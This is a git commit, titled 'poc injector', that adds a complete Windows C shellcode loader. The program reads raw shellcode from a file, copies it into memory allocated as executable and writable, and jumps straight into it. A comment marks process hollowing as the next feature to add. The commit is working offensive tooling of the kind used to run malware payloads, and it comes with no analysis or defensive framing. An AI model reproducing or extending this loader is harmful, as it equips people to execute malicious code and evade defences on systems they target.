poc injector

2023-12-13 01:55:54 +02:00 · 2023-12-13 01:55:54 +02:00 · 1aa378391b
commit 1aa378391b
parent a2963c9af5
1 changed files with 51 additions and 0 deletions
--- a/injector/injector.c
+++ b/injector/injector.c
@ -0,0 +1,51 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(int argc, char *argv[])
+{
+    FILE *fin;
+    unsigned char *buffer;
+    long fsize;
+    LPVOID base;
+
+    // TODO: implement process hollowing
+
+    if (argc != 2)
+    {
+        printf("[?] Usage: injector.exe <shellcode-path>\n");
+        return 1;
+    }
+
+    printf("[+] Reading shellcode from %s\n", argv[1]);
+    fin = fopen(argv[1], "rb");
+
+    if (fin == NULL)
+    {
+        printf("[!] Error: could not open file %s\n", argv[1]);
+        return 1;
+    }
+
+    fseek(fin, 0, SEEK_END);
+    fsize = ftell(fin);
+    rewind(fin);
+
+    buffer = (char *)malloc(fsize);
+    fread(buffer, fsize, 1, fin);
+    fclose(fin);
+
+    base = VirtualAlloc(NULL, fsize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    if (base == NULL)
+    {
+        printf("[!] Error: could not allocate memory\n");
+        return 1;
+    }
+
+    memcpy(base, buffer, fsize);
+
+    printf("[+] Executing 'jmp *%%%p'\n", base);
+    __asm__("jmp *%0\n" ::"r"(base));
+
+    return 1;
+}